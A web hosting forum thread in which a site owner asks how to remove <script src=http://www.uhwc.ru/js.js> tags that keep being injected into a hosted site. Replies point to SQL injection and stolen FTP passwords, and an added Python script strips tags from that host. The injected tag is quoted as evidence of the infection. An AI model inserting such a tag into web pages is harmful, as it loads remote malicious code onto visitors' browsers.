  1. #1
    Join Date
    May 2009
    Location
    Jammu & Kashmir
    Posts
    234

    How to get out malware/botnet virus from database/website

    Problem Described by the client:
    ------I have created one website. When I hosted it on the server, malware is automatically added;
    when viewing the source code, the following lines are automatically added:

    <script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script>

    How to get this malware line out of my website? If I remove those lines and upload again, those lines are added automatically again. How to solve this problem? How are these lines added automatically?--------

    We tried to resolve the problem by re-creating the account, installing the script with fresh files, etc., but after a few hours this problem/error comes back.
    I would be happy to receive your kind replies that might help us to resolve this problem.

    Regards,
    Wajdan

  2. #2
    Join Date
    Sep 2006
    Location
    Dallas, TX
    Posts
    333
    Is the web site generated from a database that is open to SQL injection attack?

  3. #3
    Join Date
    May 2009
    Location
    Jammu & Kashmir
    Posts
    234
    Originally posted by NeilAgg:
    Is the web site generated from a database that is open to SQL injection attack?
    We're not very sure. We have many other clients running the same script with no problems.
    If it's a SQL injection attack, is there any way to clean the database from such kinds of attacks and protect the database from future attacks?

    Thanks for your kind reply.

  4. #4
    Join Date
    Sep 2006
    Location
    Dallas, TX
    Posts
    333
    You need to find out how the site is being attacked and plug the hole.
    Does the site use a back-end database?

  5. #5
    Join Date
    May 2009
    Location
    Jammu & Kashmir
    Posts
    234
    Originally posted by NeilAgg:
    You need to find out how the site is being attacked and plug the hole.
    Does the site use a back-end database?
    Yes, Database tech is MySQL.

  6. #6
    Join Date
    Sep 2006
    Location
    Dallas, TX
    Posts
    333
    Take a look at this page:
    http://en.wikipedia.org/wiki/SQL_injection
    Make sure your systems are hardened against that.

  7. #7
    Join Date
    May 2009
    Location
    Jammu & Kashmir
    Posts
    234
    Originally posted by NeilAgg:
    Take a look at this page:
    http://en.wikipedia.org/wiki/SQL_injection
    Make sure your systems are hardened against that.
    Would this help too? http://www.networkcloaking.com/ASPROX_Toolkit.pdf

    Thanks for your kind replies. We're waiting for more suggestions and ways to remove such kind of attacks from the database/script.

  8. #8
    Join Date
    Sep 2006
    Location
    Dallas, TX
    Posts
    333
    That is someone trying to sell you something.
    You need to understand how the attack happened.
    Nobody will be able to tell you that from the outside.

  9. #9
    Join Date
    Dec 2003
    Location
    Pakistan
    Posts
    344
    In my experience, this happens when your FTP password is compromised by some Trojan horse by decrypting password from the FTP software (in most cases, CuteFTP was installed) and this code is injected from multiple locations (random proxies).

    The solution is...

    1. Clean up the PC with an updated version of anti-virus like AVG
    2. Change FTP password
    3. Download all files and remove malicious code (Dreamweaver's find/replace works like a charm)
    4. Upload cleaned files
    5. Update the password to a really C00mPl3x string
    6. Use Google Webmaster tools to submit a review request to delist from Google's blacklist
    7. Keep the password updated

    It worked for every infected account for our clients!
    Muhammad Waseem
    Inspedium Corporation (Pvt) Ltd.
    InsPanel - Hosting Control Panel for Windows 2000/2003
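
Step 3 of the procedure above (download all files and remove the malicious code), as an added example that is not part of the original posts: a Python script that removes only `<script>` tags whose `src` host matches the one quoted in post #1 and keeps a `.infected` copy of each changed file. The file-extension list and the sample tree are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

BAD_HOSTS = {"www.uhwc.ru", "uhwc.ru"}  # host from the tag quoted in post #1
# File types to scan: an assumption, adjust to what the site actually serves.
EXTENSIONS = {".html", ".htm", ".php", ".asp", ".aspx", ".js", ".tpl"}

# <script ... src=//HOST/...></script>, quoted or unquoted src, any case.
SCRIPT_TAG = re.compile(
    r"""<script\b[^>]*?\bsrc\s*=\s*["']?(?:https?:)?//([^/"'\s>]+)[^>]*>\s*</script\s*>""",
    re.IGNORECASE,
)

def strip_injected(text, bad_hosts=BAD_HOSTS):
    """Return (cleaned_text, removed_count); tags for other hosts are kept."""
    removed = 0
    def repl(match):
        nonlocal removed
        if match.group(1).lower() not in bad_hosts:
            return match.group(0)
        removed += 1
        return ""
    return SCRIPT_TAG.sub(repl, text), removed

def clean_tree(root, bad_hosts=BAD_HOSTS, dry_run=True):
    """Return {path: removed_count}; if not dry_run, rewrite files and keep a .infected copy."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file() or path.suffix.lower() not in EXTENSIONS:
            continue
        raw = path.read_bytes()
        # latin-1 maps every byte to one character, so the file round-trips unchanged.
        cleaned, count = strip_injected(raw.decode("latin-1"), bad_hosts)
        if count:
            report[str(path)] = count
            if not dry_run:
                path.with_name(path.name + ".infected").write_bytes(raw)
                path.write_bytes(cleaned.encode("latin-1"))
    return report

if __name__ == "__main__":
    # Constructed sample tree standing in for the downloaded site copy.
    with tempfile.TemporaryDirectory() as site:
        tag = "<script src=http://www.uhwc.ru/js.js></script>"
        Path(site, "index.php").write_text("<html><body>Home</body></html>" + tag * 7)
        Path(site, "about.html").write_text('<script src="/js/site.js"></script>')
        for name, count in clean_tree(site, dry_run=False).items():
            print(f"{name}: removed {count} injected tag(s)")
```

Running `clean_tree` with `dry_run=True` against a fresh download taken after re-uploading lists exactly which files were modified again, which helps narrow down how the tags are being written back.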

  10. #10
    Join Date
    May 2009
    Location
    Jammu & Kashmir
    Posts
    234
    Originally posted by mwaseem:
    In my experience, this happens when your FTP password is compromised by some Trojan horse by decrypting password from the FTP software (in most cases, CuteFTP was installed) and this code is injected from multiple locations (random proxies).

    The solution is...

    1. Clean up the PC with an updated version of anti-virus like AVG
    2. Change FTP password
    3. Download all files and remove malicious code (Dreamweaver's find/replace works like a charm)
    4. Upload cleaned files
    5. Update the password to a really C00mPl3x string
    6. Use Google Webmaster tools to submit a review request to delist from Google's blacklist
    7. Keep the password updated

    It worked for every infected account for our clients!
    This has been done twice but failed.
